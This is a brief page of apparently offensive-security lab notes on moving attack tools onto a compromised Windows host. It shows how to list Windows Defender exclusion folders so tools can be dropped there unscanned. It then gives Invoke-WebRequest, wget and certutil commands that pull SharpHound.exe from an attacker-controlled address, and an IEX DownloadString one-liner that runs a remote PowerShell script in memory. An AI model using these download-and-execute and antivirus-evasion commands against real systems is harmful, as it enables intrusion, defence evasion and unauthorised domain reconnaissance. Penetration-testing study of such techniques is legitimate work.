File Transfer

First find the excluded folder from windows defender by doing

Get-MpPreference | Select-Object -ExpandProperty ExclusionPath

  • Suppose C:\AD is excluded from defender then go to that directory and

Invoke-WebRequest -Uri http://tun0-ip:port/SharpHound.exe -OutFile .\SharpHound.exe

OR

wget http://172.16.99.145:8000/SharpHound.exe -O .\SharpHound.exe

OR (Certutil is not working currently)

certutil -urlcache -f -split http://tun0-ip:port/SharpHound.exe -OutFile .\SharpHound.exe

  • We can also directly load powershell scripts in memory using 

IEX(New-Object Net.WebClient).downloadString('http://tun0-ip:port/filename.ps1')

see powershell-theory.md section.

Previousdomain enumerationNextPowerShell ADModule

Last updated